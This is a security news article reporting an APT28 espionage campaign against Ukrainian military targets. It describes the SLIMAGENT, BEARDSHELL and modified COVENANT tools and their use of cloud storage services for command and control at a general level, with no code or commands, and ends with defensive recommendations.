APT28 Targets Ukrainian Military with BEARDSHELL and COVENANT Malware
Russian state-linked hackers continue evolving their cyber-espionage toolkit using cloud-based command-and-control and stealth implants.
The Russian state-sponsored threat group widely known as APT28 has launched a sophisticated cyber-espionage campaign targeting Ukrainian military personnel using two advanced malware tools known as BEARDSHELL and COVENANT. Security researchers revealed that the operation has been active since April 2024, highlighting the continued role of cyber warfare in geopolitical conflicts.
APT28, often associated with Russia’s military intelligence unit GRU Unit 26165, has operated for over a decade under multiple aliases including Fancy Bear, Sofacy, and Sednit. The group frequently targets government institutions, defense organizations, and critical infrastructure worldwide. However, the latest campaign shows a renewed focus on long-term surveillance and intelligence gathering within Ukraine’s defense ecosystem.
Multi-Layered Malware Toolkit
The attackers rely on a combination of implants to maintain persistence and gather intelligence from compromised systems.
One of the core tools in the campaign is SLIMAGENT, a surveillance implant capable of logging keystrokes, capturing screenshots, and collecting clipboard data. The malware generates detailed activity logs in HTML format, allowing operators to review user behavior and sensitive information collected from infected systems.
Interestingly, SLIMAGENT shares code similarities with XAgent, an earlier espionage malware used by APT28 during operations in the 2010s. This connection suggests that the threat actor continues to evolve its existing malware families rather than building entirely new frameworks. As a result, defenders may face challenges detecting variants that inherit legacy code but introduce new obfuscation methods.
BEARDSHELL Backdoor and Cloud-Based C2
Another key component of the operation is BEARDSHELL, a backdoor designed to execute PowerShell commands on compromised machines. This tool allows attackers to maintain remote control over infected systems while quietly collecting intelligence.
What makes BEARDSHELL particularly notable is its command-and-control strategy. Instead of relying on traditional malicious infrastructure, the malware communicates with operators through the legitimate cloud storage service Icedrive. By blending malicious traffic with legitimate cloud activity, the attackers significantly reduce the chances of detection by security monitoring systems.
Additionally, researchers identified a rare obfuscation technique called opaque predicates within BEARDSHELL. This technique complicates malware analysis and has previously appeared in XTunnel, another tool used by APT28 in past high-profile cyber operations.
Modified COVENANT Framework
The threat group also uses a heavily customized version of COVENANT, an open-source .NET post-exploitation framework originally developed for red-team operations. Although official development of the tool stopped in 2021, APT28 has continued to adapt and extend it for espionage purposes.
In the current campaign, the modified framework communicates through the Filen cloud storage service, creating another stealthy command channel. Previous campaigns reportedly used other cloud providers, demonstrating how the group continuously rotates infrastructure to evade detection.
These modifications show that the attackers possess deep technical expertise and long-term operational planning. By adapting publicly available tools and combining them with custom malware, they maintain a powerful and flexible cyber-espionage capability.
Strategic Implications
The campaign reflects a broader shift in advanced persistent threat operations. Rather than relying solely on bespoke malware, attackers increasingly blend open-source frameworks with custom implants and cloud services. This approach lowers operational costs while improving stealth.
For defense organizations and governments, the threat remains significant. Persistent espionage campaigns like this aim to gather intelligence on military strategies, operational planning, and defense infrastructure. Therefore, organizations must strengthen endpoint monitoring, restrict unauthorized cloud communications, and maintain visibility into PowerShell activity across networks.
As geopolitical tensions continue to influence cyber operations, campaigns like this demonstrate how cyber espionage remains a critical component of modern conflict.